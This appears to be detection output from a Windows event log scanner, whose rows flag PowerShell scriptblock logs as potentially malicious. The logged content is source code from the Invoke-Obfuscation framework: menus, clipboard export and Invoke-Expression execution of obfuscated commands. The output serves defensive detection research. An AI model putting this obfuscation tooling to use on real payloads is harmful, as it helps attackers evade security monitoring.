-NoNewLine -ForegroundColor Yellow Write-Host ""."" -ForegroundColor Cyan C:\Windows\Notepad.exe $OutputFilePath } Else { Write-Host ""`nERROR: Unable to write ObfuscatedCommand out to"" -NoNewLine -ForegroundColor Red Write-Host "" $OutputFilePath"" -NoNewLine -ForegroundColor Yellow } } ElseIf($Script:ObfuscatedCommand -eq '') { Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host "" There isn't anything to write out to disk.`n Just enter"" -NoNewLine Write-Host "" SHOW OPTIONS"" -NoNewLine -ForegroundColor Yellow Write-Host "" and look at ObfuscatedCommand."" } } ElseIf($CopyToClipboardInputOptions[0] -Contains $UserInput) { If(($Script:ObfuscatedCommand -ne '') -AND ($Script:ObfuscatedCommand -ceq $Script:ScriptBlock)) { Write-Host ""`n`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" You haven't applied any obfuscation.`n Just enter"" -NoNewLine Write-Host "" SHOW OPTIONS"" -NoNewLine -ForegroundColor Yellow Write-Host "" and look at ObfuscatedCommand."" } ElseIf($Script:ObfuscatedCommand -ne '') { # Copy ObfuscatedCommand to clipboard. # Try-Catch block introduced since PowerShell v2.0 without -STA defined will not be able to perform clipboard functionality. Try { $Null = [Reflection.Assembly]::LoadWithPartialName(""System.Windows.Forms"") [Windows.Forms.Clipboard]::SetText($Script:ObfuscatedCommand) If($Script:LauncherApplied) { Write-Host ""`n`nSuccessfully copied ObfuscatedCommand to clipboard."" -ForegroundColor Cyan } Else { Write-Host ""`n`nSuccessfully copied ObfuscatedCommand to clipboard.`nNo Launcher has been applied, so command can only be pasted into powershell.exe."" -ForegroundColor Cyan } } Catch { $ErrorMessage = ""Clipboard functionality will not work in PowerShell version $($PsVersionTable.PsVersion.Major) unless you add -STA (Single-Threaded Apartment) execution flag to powershell.exe."" If((Get-Command Write-Host).CommandType -ne 'Cmdlet') { # Retrieving Write-Host and Start-Sleep Cmdlets to get around the current proxy functions of Write-Host and Start-Sleep that are overloaded if -Quiet flag was used. . ((Get-Command Write-Host) | Where-Object {$_.CommandType -eq 'Cmdlet'}) ""`n`nWARNING: "" -NoNewLine -ForegroundColor Red . ((Get-Command Write-Host) | Where-Object {$_.CommandType -eq 'Cmdlet'}) $ErrorMessage -NoNewLine . ((Get-Command Start-Sleep) | Where-Object {$_.CommandType -eq 'Cmdlet'}) 2 } Else { Write-Host ""`n`nWARNING: "" -NoNewLine -ForegroundColor Red Write-Host $ErrorMessage If($Script:CliSyntax -gt 0) {Start-Sleep 2} } } $Script:CliSyntax += 'clip' } ElseIf($Script:ObfuscatedCommand -eq '') { Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host "" There isn't anything to copy to your clipboard.`n Just enter"" -NoNewLine Write-Host "" SHOW OPTIONS"" -NoNewLine -ForegroundColor Yellow Write-Host "" and look at ObfuscatedCommand."" -NoNewLine } } ElseIf($ExecutionInputOptions[0] -Contains $UserInput) { If($Script:LauncherApplied) { Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host "" Cannot execute because you have applied a Launcher.`n Enter"" -NoNewLine Write-Host "" COPY"" -NoNewLine -ForeGroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""CLIP"" -NoNewLine -ForeGroundColor Yellow Write-Host "" and paste into cmd.exe.`n Or enter"" -NoNewLine Write-Host "" UNDO"" -NoNewLine -ForeGroundColor Yellow Write-Host "" to remove the Launcher from ObfuscatedCommand."" } ElseIf($Script:ObfuscatedCommand -ne '') { If($Script:ObfuscatedCommand -ceq $Script:ScriptBlock) {Write-Host ""`n`nInvoking (though you haven't obfuscated anything yet):""} Else {Write-Host ""`n`nInvoking:""} Out-ScriptContents $Script:ObfuscatedCommand Write-Host '' $null = Invoke-Expression $Script:ObfuscatedCommand } Else { Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host "" Cannot execute because you have not set ScriptPath or ScriptBlock.`n Enter"" -NoNewline Write-Host "" SHOW OPTIONS"" -NoNewLine -ForegroundColor Yellow Write-Host "" to set ScriptPath or ScriptBlock."" } } Else { Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host "" You entered an invalid option. Enter"" -NoNewLine Write-Host "" HELP"" -NoNewLine -ForegroundColor Yellow Write-Host "" for more information."" # If the failed input was part of $Script:CompoundCommand then cancel out the rest of the compound command so it is not further processed. If($Script:CompoundCommand.Count -gt 0) { $Script:CompoundCommand = @() } # Output all available/acceptable options for current menu if invalid input was entered. If($AcceptableInput.Count -gt 1) { $Message = 'Valid options for current menu include:' } Else { $Message = 'Valid option for current menu includes:' } Write-Host "" $Message "" -NoNewLine $Counter=0 ForEach($AcceptableOption in $AcceptableInput) { $Counter++ # Change color and verbiage if acceptable options will execute an obfuscation function. If($SelectionContainsCommand) { $ColorToOutput = 'Green' } Else { $ColorToOutput = 'Yellow' } Write-Host $AcceptableOption -NoNewLine -ForegroundColor $ColorToOutput If(($Counter -lt $AcceptableInput.Length) -AND ($AcceptableOption.Length -gt 0)) { Write-Host ', ' -NoNewLine } } Write-Host '' } } } Return $UserInput.ToLower() } Function Show-OptionsMenu { <# .SYNOPSIS HELPER FUNCTION :: Displays options menu for Invoke-Obfuscation. Invoke-Obfuscation Function: Show-OptionsMenu Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Show-OptionsMenu displays options menu for Invoke-Obfuscation. .EXAMPLE C:\PS> Show-OptionsMenu .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> # Set potentially-updated script-level values in $Script:OptionsMenu before displaying. $Counter = 0 ForEach($Line in $Script:OptionsMenu) { If($Line[0].ToLower().Trim() -eq 'scriptpath') {$Script:OptionsMenu[$Counter][1] = $Script:ScriptPath} If($Line[0].ToLower().Trim() -eq 'scriptblock') {$Script:OptionsMenu[$Counter][1] = $Script:ScriptBlock} If($Line[0].ToLower().Trim() -eq 'commandlinesyntax') {$Script:OptionsMenu[$Counter][1] = $Script:CliSyntax} If($Line[0].ToLower().Trim() -eq 'executioncommands') {$Script:OptionsMenu[$Counter][1] = $Script:ExecutionCommands} If($Line[0].ToLower().Trim() -eq 'obfuscatedcommand') { # Only add obfuscatedcommand if it is different than scriptblock (to avoid showing obfuscatedcommand before it has been obfuscated). If($Script:ObfuscatedCommand -cne $Script:ScriptBlock) {$Script:OptionsMenu[$Counter][1] = $Script:ObfuscatedCommand} Else {$Script:OptionsMenu[$Counter][1] = ''} } If($Line[0].ToLower().Trim() -eq 'obfuscationlength') { # Only set/display ObfuscationLength if there is an obfuscated command. If(($Script:ObfuscatedCommand.Length -gt 0) -AND ($Script:ObfuscatedCommand -cne $Script:ScriptBlock)) {$Script:OptionsMenu[$Counter][1] = $Script:ObfuscatedCommand.Length} Else {$Script:OptionsMenu[$Counter][1] = ''} } $Counter++",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.300 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"} # Output menu. Write-Host ""`n`nSHOW OPTIONS"" -NoNewLine -ForegroundColor Cyan Write-Host "" ::"" -NoNewLine Write-Host "" Yellow"" -NoNewLine -ForegroundColor Yellow Write-Host "" options can be set by entering"" -NoNewLine Write-Host "" SET OPTIONNAME VALUE"" -NoNewLine -ForegroundColor Green Write-Host "".`n"" ForEach($Option in $Script:OptionsMenu) { $OptionTitle = $Option[0] $OptionValue = $Option[1] $CanSetValue = $Option[2] Write-Host $LineSpacing -NoNewLine # For options that can be set by user, output as Yellow. If($CanSetValue) {Write-Host $OptionTitle -NoNewLine -ForegroundColor Yellow} Else {Write-Host $OptionTitle -NoNewLine} Write-Host "": "" -NoNewLine # Handle coloring and multi-value output for ExecutionCommands and ObfuscationLength. If($OptionTitle -eq 'ObfuscationLength') { Write-Host $OptionValue -ForegroundColor Cyan } ElseIf($OptionTitle -eq 'ScriptBlock') { Out-ScriptContents $OptionValue } ElseIf($OptionTitle -eq 'CommandLineSyntax') { # CLISyntax output. $SetSyntax = '' If(($Script:ScriptPath.Length -gt 0) -AND ($Script:ScriptPath -ne 'N/A')) { $SetSyntax = "" -ScriptPath '$Script:ScriptPath'"" } ElseIf(($Script:ScriptBlock.Length -gt 0) -AND ($Script:ScriptPath -eq 'N/A')) { $SetSyntax = "" -ScriptBlock {$Script:ScriptBlock}"" } $CommandSyntax = '' If($OptionValue.Count -gt 0) { $CommandSyntax = "" -Command '"" + ($OptionValue -Join ',') + ""' -Quiet"" } If(($SetSyntax -ne '') -OR ($CommandSyntax -ne '')) { $CliSyntaxToOutput = ""Invoke-Obfuscation"" + $SetSyntax + $CommandSyntax Write-Host $CliSyntaxToOutput -ForegroundColor Cyan } Else { Write-Host '' } } ElseIf($OptionTitle -eq 'ExecutionCommands') { # ExecutionCommands output. If($OptionValue.Count -gt 0) {Write-Host ''} $Counter = 0 ForEach($ExecutionCommand in $OptionValue) { $Counter++ If($ExecutionCommand.Length -eq 0) {Write-Host ''; Continue} $ExecutionCommand = $ExecutionCommand.Replace('$ScriptBlock','~').Split('~') Write-Host "" $($ExecutionCommand[0])"" -NoNewLine -ForegroundColor Cyan Write-Host '$ScriptBlock' -NoNewLine -ForegroundColor Magenta # Handle output formatting when SHOW OPTIONS is run. If(($OptionValue.Count -gt 0) -AND ($Counter -lt $OptionValue.Count)) { Write-Host $ExecutionCommand[1] -ForegroundColor Cyan } Else { Write-Host $ExecutionCommand[1] -NoNewLine -ForegroundColor Cyan } } Write-Host '' } ElseIf($OptionTitle -eq 'ObfuscatedCommand') { Out-ScriptContents $OptionValue } Else { Write-Host $OptionValue -ForegroundColor Magenta } } } Function Show-HelpMenu { <# .SYNOPSIS HELPER FUNCTION :: Displays help menu for Invoke-Obfuscation. Invoke-Obfuscation Function: Show-HelpMenu Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Show-HelpMenu displays help menu for Invoke-Obfuscation. .EXAMPLE C:\PS> Show-HelpMenu .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> # Show Help Menu. Write-Host ""`n`nHELP MENU"" -NoNewLine -ForegroundColor Cyan Write-Host "" :: Available"" -NoNewLine Write-Host "" options"" -NoNewLine -ForegroundColor Yellow Write-Host "" shown below:`n"" ForEach($InputOptionsList in $AllAvailableInputOptionsLists) { $InputOptionsCommands = $InputOptionsList[0] $InputOptionsDescription = $InputOptionsList[1] # Add additional coloring to string encapsulated by <> if it exists in $InputOptionsDescription. If($InputOptionsDescription.Contains('<') -AND $InputOptionsDescription.Contains('>')) { $FirstPart = $InputOptionsDescription.SubString(0,$InputOptionsDescription.IndexOf('<')) $MiddlePart = $InputOptionsDescription.SubString($FirstPart.Length+1) $MiddlePart = $MiddlePart.SubString(0,$MiddlePart.IndexOf('>')) $LastPart = $InputOptionsDescription.SubString($FirstPart.Length+$MiddlePart.Length+2) Write-Host ""$LineSpacing $FirstPart"" -NoNewLine Write-Host $MiddlePart -NoNewLine -ForegroundColor Cyan Write-Host $LastPart -NoNewLine } Else { Write-Host ""$LineSpacing $InputOptionsDescription"" -NoNewLine } $Counter = 0 ForEach($Command in $InputOptionsCommands) { $Counter++ Write-Host $Command.ToUpper() -NoNewLine -ForegroundColor Yellow If($Counter -lt $InputOptionsCommands.Count) {Write-Host ',' -NoNewLine} } Write-Host '' } } Function Show-Tutorial { <# .SYNOPSIS HELPER FUNCTION :: Displays tutorial information for Invoke-Obfuscation. Invoke-Obfuscation Function: Show-Tutorial Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Show-Tutorial displays tutorial information for Invoke-Obfuscation. .EXAMPLE C:\PS> Show-Tutorial .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> Write-Host ""`n`nTUTORIAL"" -NoNewLine -ForegroundColor Cyan Write-Host "" :: Here is a quick tutorial showing you how to get your obfuscation on:"" Write-Host ""`n1) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Load a scriptblock (SET SCRIPTBLOCK) or a script path/URL (SET SCRIPTPATH)."" Write-Host "" SET SCRIPTBLOCK Write-Host 'This is my test command' -ForegroundColor Green"" -ForegroundColor Green Write-Host ""`n2) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Navigate through the obfuscation menus where the options are in"" -NoNewLine Write-Host "" YELLOW"" -NoNewLine -ForegroundColor Yellow Write-Host ""."" Write-Host "" GREEN"" -NoNewLine -ForegroundColor Green Write-Host "" options apply obfuscation."" Write-Host "" Enter"" -NoNewLine Write-Host "" BACK"" -NoNewLine -ForegroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""CD .."" -NoNewLine -ForegroundColor Yellow Write-Host "" to go to previous menu and"" -NoNewLine Write-Host "" HOME"" -NoNewline -ForegroundColor Yellow Write-Host ""/"" -NoNewline Write-Host ""MAIN"" -NoNewline -ForegroundColor Yellow Write-Host "" to go to home menu.`n E.g. Enter"" -NoNewLine Write-Host "" ENCODING"" -NoNewLine -ForegroundColor Yellow Write-Host "" & then"" -NoNewLine Write-Host "" 5"" -NoNewLine -ForegroundColor Green Write-Host "" to apply SecureString obfuscation."" Write-Host ""`n3) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Enter"" -NoNewLine Write-Host "" TEST"" -NoNewLine -ForegroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""EXEC"" -NoNewLine -ForegroundColor Yellow Write-Host "" to test the obfuscated command locally.`n Enter"" -NoNewLine Write-Host "" SHOW"" -NoNewLine -ForegroundColor Yellow Write-Host "" to see the currently obfuscated command."" Write-Host ""`n4) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Enter"" -NoNewLine Write-Host "" COPY"" -NoNewLine -ForegroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""CLIP"" -NoNewLine -ForegroundColor Yellow Write-Host "" to copy obfuscated command out to your clipboard."" Write-Host "" Enter"" -NoNewLine Write-Host "" OUT"" -NoNewLine -ForegroundColor Yellow Write-Host "" to write obfuscated command out to disk."" Write-Host ""`n5) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Enter"" -NoNewLine Write-Host "" RESET"" -NoNewLine -ForegroundColor Yellow Write-Host "" to remove all obfuscation and start over.`n Enter"" -NoNewLine Write-Host "" UNDO"" -NoNewLine -ForegroundColor Yellow Write-Host "" to undo last obfuscation.`n Enter"" -NoNewLine Write-Host "" HELP"" -NoNewLine -ForegroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""?"" -NoNewLine -ForegroundColor Yellow Write-Host "" for help menu."" Write-Host ""`nAnd finally the obligatory `""Don't use this for evil, please`"""" -NoNewLine -ForegroundColor Cyan Write-Host "" :)"" -ForegroundColor Green } Function Out-ScriptContents { <# .SYNOPSIS HELPER FUNCTION :: Displays current obfuscated command for Invoke-Obfuscation. Invoke-Obfuscation Function: Out-ScriptContents Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-ScriptContents displays current obfuscated command for Invoke-Obfuscation. .PARAMETER ScriptContents Specifies the string containing your payload. .PARAMETER PrintWarning Switch to output redacted form of ScriptContents if they exceed 8,190 characters. .EXAMPLE C:\PS> Out-ScriptContents .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> Param( [Parameter(ValueFromPipeline = $true)] [String] $ScriptContents, [Switch] $PrintWarning ) If($ScriptContents.Length -gt $CmdMaxLength) { # Output ScriptContents, handling if the size of ScriptContents exceeds $CmdMaxLength characters. $RedactedPrintLength = $CmdMaxLength/5 # Handle printing redaction message in middle of screen. #OCD $CmdLineWidth = (Get-Host).UI.RawUI.BufferSize.Width $RedactionMessage = """" $CenteredRedactionMessageStartIndex = (($CmdLineWidth-$RedactionMessage.Length)/2) - ""[*] ObfuscatedCommand: "".Length $CurrentRedactionMessageStartIndex = ($RedactedPrintLength % $CmdLineWidth) If($CurrentRedactionMessageStartIndex -gt $CenteredRedactionMessageStartIndex) { $RedactedPrintLength = $RedactedPrintLength-($CurrentRedactionMessageStartIndex-$CenteredRedactionMessageStartIndex) } Else { $RedactedPrintLength = $RedactedPrintLength+($CenteredRedactionMessageStartIndex-$CurrentRedactionMessageStartIndex) } Write-Host $ScriptContents.SubString(0,$RedactedPrintLength) -NoNewLine -ForegroundColor Magenta Write-",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.300 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"} # Output menu. Write-Host ""`n`nSHOW OPTIONS"" -NoNewLine -ForegroundColor Cyan Write-Host "" ::"" -NoNewLine Write-Host "" Yellow"" -NoNewLine -ForegroundColor Yellow Write-Host "" options can be set by entering"" -NoNewLine Write-Host "" SET OPTIONNAME VALUE"" -NoNewLine -ForegroundColor Green Write-Host "".`n"" ForEach($Option in $Script:OptionsMenu) { $OptionTitle = $Option[0] $OptionValue = $Option[1] $CanSetValue = $Option[2] Write-Host $LineSpacing -NoNewLine # For options that can be set by user, output as Yellow. If($CanSetValue) {Write-Host $OptionTitle -NoNewLine -ForegroundColor Yellow} Else {Write-Host $OptionTitle -NoNewLine} Write-Host "": "" -NoNewLine # Handle coloring and multi-value output for ExecutionCommands and ObfuscationLength. If($OptionTitle -eq 'ObfuscationLength') { Write-Host $OptionValue -ForegroundColor Cyan } ElseIf($OptionTitle -eq 'ScriptBlock') { Out-ScriptContents $OptionValue } ElseIf($OptionTitle -eq 'CommandLineSyntax') { # CLISyntax output. $SetSyntax = '' If(($Script:ScriptPath.Length -gt 0) -AND ($Script:ScriptPath -ne 'N/A')) { $SetSyntax = "" -ScriptPath '$Script:ScriptPath'"" } ElseIf(($Script:ScriptBlock.Length -gt 0) -AND ($Script:ScriptPath -eq 'N/A')) { $SetSyntax = "" -ScriptBlock {$Script:ScriptBlock}"" } $CommandSyntax = '' If($OptionValue.Count -gt 0) { $CommandSyntax = "" -Command '"" + ($OptionValue -Join ',') + ""' -Quiet"" } If(($SetSyntax -ne '') -OR ($CommandSyntax -ne '')) { $CliSyntaxToOutput = ""Invoke-Obfuscation"" + $SetSyntax + $CommandSyntax Write-Host $CliSyntaxToOutput -ForegroundColor Cyan } Else { Write-Host '' } } ElseIf($OptionTitle -eq 'ExecutionCommands') { # ExecutionCommands output. If($OptionValue.Count -gt 0) {Write-Host ''} $Counter = 0 ForEach($ExecutionCommand in $OptionValue) { $Counter++ If($ExecutionCommand.Length -eq 0) {Write-Host ''; Continue} $ExecutionCommand = $ExecutionCommand.Replace('$ScriptBlock','~').Split('~') Write-Host "" $($ExecutionCommand[0])"" -NoNewLine -ForegroundColor Cyan Write-Host '$ScriptBlock' -NoNewLine -ForegroundColor Magenta # Handle output formatting when SHOW OPTIONS is run. If(($OptionValue.Count -gt 0) -AND ($Counter -lt $OptionValue.Count)) { Write-Host $ExecutionCommand[1] -ForegroundColor Cyan } Else { Write-Host $ExecutionCommand[1] -NoNewLine -ForegroundColor Cyan } } Write-Host '' } ElseIf($OptionTitle -eq 'ObfuscatedCommand') { Out-ScriptContents $OptionValue } Else { Write-Host $OptionValue -ForegroundColor Magenta } } } Function Show-HelpMenu { <# .SYNOPSIS HELPER FUNCTION :: Displays help menu for Invoke-Obfuscation. Invoke-Obfuscation Function: Show-HelpMenu Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Show-HelpMenu displays help menu for Invoke-Obfuscation. .EXAMPLE C:\PS> Show-HelpMenu .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> # Show Help Menu. Write-Host ""`n`nHELP MENU"" -NoNewLine -ForegroundColor Cyan Write-Host "" :: Available"" -NoNewLine Write-Host "" options"" -NoNewLine -ForegroundColor Yellow Write-Host "" shown below:`n"" ForEach($InputOptionsList in $AllAvailableInputOptionsLists) { $InputOptionsCommands = $InputOptionsList[0] $InputOptionsDescription = $InputOptionsList[1] # Add additional coloring to string encapsulated by <> if it exists in $InputOptionsDescription. If($InputOptionsDescription.Contains('<') -AND $InputOptionsDescription.Contains('>')) { $FirstPart = $InputOptionsDescription.SubString(0,$InputOptionsDescription.IndexOf('<')) $MiddlePart = $InputOptionsDescription.SubString($FirstPart.Length+1) $MiddlePart = $MiddlePart.SubString(0,$MiddlePart.IndexOf('>')) $LastPart = $InputOptionsDescription.SubString($FirstPart.Length+$MiddlePart.Length+2) Write-Host ""$LineSpacing $FirstPart"" -NoNewLine Write-Host $MiddlePart -NoNewLine -ForegroundColor Cyan Write-Host $LastPart -NoNewLine } Else { Write-Host ""$LineSpacing $InputOptionsDescription"" -NoNewLine } $Counter = 0 ForEach($Command in $InputOptionsCommands) { $Counter++ Write-Host $Command.ToUpper() -NoNewLine -ForegroundColor Yellow If($Counter -lt $InputOptionsCommands.Count) {Write-Host ',' -NoNewLine} } Write-Host '' } } Function Show-Tutorial { <# .SYNOPSIS HELPER FUNCTION :: Displays tutorial information for Invoke-Obfuscation. Invoke-Obfuscation Function: Show-Tutorial Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Show-Tutorial displays tutorial information for Invoke-Obfuscation. .EXAMPLE C:\PS> Show-Tutorial .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> Write-Host ""`n`nTUTORIAL"" -NoNewLine -ForegroundColor Cyan Write-Host "" :: Here is a quick tutorial showing you how to get your obfuscation on:"" Write-Host ""`n1) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Load a scriptblock (SET SCRIPTBLOCK) or a script path/URL (SET SCRIPTPATH)."" Write-Host "" SET SCRIPTBLOCK Write-Host 'This is my test command' -ForegroundColor Green"" -ForegroundColor Green Write-Host ""`n2) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Navigate through the obfuscation menus where the options are in"" -NoNewLine Write-Host "" YELLOW"" -NoNewLine -ForegroundColor Yellow Write-Host ""."" Write-Host "" GREEN"" -NoNewLine -ForegroundColor Green Write-Host "" options apply obfuscation."" Write-Host "" Enter"" -NoNewLine Write-Host "" BACK"" -NoNewLine -ForegroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""CD .."" -NoNewLine -ForegroundColor Yellow Write-Host "" to go to previous menu and"" -NoNewLine Write-Host "" HOME"" -NoNewline -ForegroundColor Yellow Write-Host ""/"" -NoNewline Write-Host ""MAIN"" -NoNewline -ForegroundColor Yellow Write-Host "" to go to home menu.`n E.g. Enter"" -NoNewLine Write-Host "" ENCODING"" -NoNewLine -ForegroundColor Yellow Write-Host "" & then"" -NoNewLine Write-Host "" 5"" -NoNewLine -ForegroundColor Green Write-Host "" to apply SecureString obfuscation."" Write-Host ""`n3) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Enter"" -NoNewLine Write-Host "" TEST"" -NoNewLine -ForegroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""EXEC"" -NoNewLine -ForegroundColor Yellow Write-Host "" to test the obfuscated command locally.`n Enter"" -NoNewLine Write-Host "" SHOW"" -NoNewLine -ForegroundColor Yellow Write-Host "" to see the currently obfuscated command."" Write-Host ""`n4) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Enter"" -NoNewLine Write-Host "" COPY"" -NoNewLine -ForegroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""CLIP"" -NoNewLine -ForegroundColor Yellow Write-Host "" to copy obfuscated command out to your clipboard."" Write-Host "" Enter"" -NoNewLine Write-Host "" OUT"" -NoNewLine -ForegroundColor Yellow Write-Host "" to write obfuscated command out to disk."" Write-Host ""`n5) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Enter"" -NoNewLine Write-Host "" RESET"" -NoNewLine -ForegroundColor Yellow Write-Host "" to remove all obfuscation and start over.`n Enter"" -NoNewLine Write-Host "" UNDO"" -NoNewLine -ForegroundColor Yellow Write-Host "" to undo last obfuscation.`n Enter"" -NoNewLine Write-Host "" HELP"" -NoNewLine -ForegroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""?"" -NoNewLine -ForegroundColor Yellow Write-Host "" for help menu."" Write-Host ""`nAnd finally the obligatory `""Don't use this for evil, please`"""" -NoNewLine -ForegroundColor Cyan Write-Host "" :)"" -ForegroundColor Green } Function Out-ScriptContents { <# .SYNOPSIS HELPER FUNCTION :: Displays current obfuscated command for Invoke-Obfuscation. Invoke-Obfuscation Function: Out-ScriptContents Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-ScriptContents displays current obfuscated command for Invoke-Obfuscation. .PARAMETER ScriptContents Specifies the string containing your payload. .PARAMETER PrintWarning Switch to output redacted form of ScriptContents if they exceed 8,190 characters. .EXAMPLE C:\PS> Out-ScriptContents .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> Param( [Parameter(ValueFromPipeline = $true)] [String] $ScriptContents, [Switch] $PrintWarning ) If($ScriptContents.Length -gt $CmdMaxLength) { # Output ScriptContents, handling if the size of ScriptContents exceeds $CmdMaxLength characters. $RedactedPrintLength = $CmdMaxLength/5 # Handle printing redaction message in middle of screen. #OCD $CmdLineWidth = (Get-Host).UI.RawUI.BufferSize.Width $RedactionMessage = """" $CenteredRedactionMessageStartIndex = (($CmdLineWidth-$RedactionMessage.Length)/2) - ""[*] ObfuscatedCommand: "".Length $CurrentRedactionMessageStartIndex = ($RedactedPrintLength % $CmdLineWidth) If($CurrentRedactionMessageStartIndex -gt $CenteredRedactionMessageStartIndex) { $RedactedPrintLength = $RedactedPrintLength-($CurrentRedactionMessageStartIndex-$CenteredRedactionMessageStartIndex) } Else { $RedactedPrintLength = $RedactedPrintLength+($CenteredRedactionMessageStartIndex-$CurrentRedactionMessageStartIndex) } Write-Host $ScriptContents.SubString(0,$RedactedPrintLength) -NoNewLine -ForegroundColor Magenta Write-",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.300 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"Host $RedactionMessage -NoNewLine -ForegroundColor Yellow Write-Host $ScriptContents.SubString($ScriptContents.Length-$RedactedPrintLength) -ForegroundColor Magenta } Else { Write-Host $ScriptContents -ForegroundColor Magenta } # Make sure final command doesn't exceed cmd.exe's character limit. If($ScriptContents.Length -gt $CmdMaxLength) { If($PSBoundParameters['PrintWarning']) { Write-Host ""`nWARNING: This command exceeds the cmd.exe maximum length of $CmdMaxLength."" -ForegroundColor Red Write-Host "" Its length is"" -NoNewLine -ForegroundColor Red Write-Host "" $($ScriptContents.Length)"" -NoNewLine -ForegroundColor Yellow Write-Host "" characters."" -ForegroundColor Red } } } Function Show-AsciiArt { <# .SYNOPSIS HELPER FUNCTION :: Displays random ASCII art for Invoke-Obfuscation. Invoke-Obfuscation Function: Show-AsciiArt Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Show-AsciiArt displays random ASCII art for Invoke-Obfuscation, and also displays ASCII art during script startup. .EXAMPLE C:\PS> Show-AsciiArt .NOTES Credit for ASCII art font generation: http://patorjk.com/software/taag/ This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0)] [ValidateNotNullOrEmpty()] [Switch] $Random ) # Create multiple ASCII art title banners. $Spacing = ""`t"" $InvokeObfuscationAscii = @() $InvokeObfuscationAscii += $Spacing + ' ____ __ ' $InvokeObfuscationAscii += $Spacing + ' / _/___ _ ______ / /_____ ' $InvokeObfuscationAscii += $Spacing + ' / // __ \ | / / __ \/ //_/ _ \______ ' $InvokeObfuscationAscii += $Spacing + ' _/ // / / / |/ / /_/ / ,< / __/_____/ ' $InvokeObfuscationAscii += $Spacing + '/______ /__|_________/_/|_|\___/ __ _ ' $InvokeObfuscationAscii += $Spacing + ' / __ \/ /_ / __/_ ________________ _/ /_(_)___ ____ ' $InvokeObfuscationAscii += $Spacing + ' / / / / __ \/ /_/ / / / ___/ ___/ __ `/ __/ / __ \/ __ \' $InvokeObfuscationAscii += $Spacing + '/ /_/ / /_/ / __/ /_/ (__ ) /__/ /_/ / /_/ / /_/ / / / /' $InvokeObfuscationAscii += $Spacing + '\____/_.___/_/ \__,_/____/\___/\__,_/\__/_/\____/_/ /_/ ' # Ascii art to run only during script startup. If(!$PSBoundParameters['Random']) { $ArrowAscii = @() $ArrowAscii += ' | ' $ArrowAscii += ' | ' $ArrowAscii += ' \ / ' $ArrowAscii += ' V ' # Show actual obfuscation example (generated with this tool) in reverse. Write-Host ""`nIEX( ( 